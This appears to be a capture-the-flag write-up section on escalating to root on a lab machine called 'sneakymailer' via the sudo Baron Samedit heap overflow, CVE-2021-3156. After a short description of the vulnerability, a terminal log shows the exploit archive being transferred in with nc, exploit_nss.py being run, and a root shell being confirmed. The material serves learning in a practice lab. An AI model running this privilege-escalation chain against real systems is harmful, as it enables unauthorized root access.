CVE-2021-3156
PEAS discovered that the target system is vulnerable to CVE-2021-3156
a vulnerability was found in sudo up to 1.8.31p2/1.9.5p1 (Operating System Utility Software). It has been rated as critical. This issue affects the function sudoers_policy_main. The manipulation with an unknown input leads to a heap-based overflow vulnerability. Using CWE to declare the problem leads to CWE-122. A heap overflow condition is a buffer overflow, where the buffer that can be overwritten is allocated in the heap portion of memory, generally meaning that the buffer was allocated using a routine such as malloc(). Impacted is confidentiality, integrity, and availability.
Exploit ([Sudo Baron Samedit](Sudo Baron Samedit Exploit))
The exploit was found online
Exploitation
www-data@sneakymailer:/dev/shm$ nc -nlvp 2222 > CVE-2021-3156.tar.gz
listening on [any] 2222 ...
connect to [10.10.10.197] from (UNKNOWN) [10.10.14.4] 42828
www-data@sneakymailer:/dev/shm$ tar -xf CVE-2021-3156.tar.gz ; cd CVE-2021-3156Delivery complete
www-data@sneakymailer:/dev/shm$ ./exploit_nss.py
sudoedit: unable to resolve host sneakymailer: Temporary failure in name resolution
#
# whoami
whoami
root
# hostname
hostname
sneakymailer
# ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: ens160: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:50:56:b9:52:ff brd ff:ff:ff:ff:ff:ff
inet 10.10.10.197/24 brd 10.10.10.255 scope global ens160
valid_lft forever preferred_lft forever
inet6 dead:beef::250:56ff:feb9:52ff/64 scope global dynamic mngtmpaddr
valid_lft 86398sec preferred_lft 14398sec
inet6 fe80::250:56ff:feb9:52ff/64 scope link
valid_lft forever preferred_lft foreverSystem Level Compromise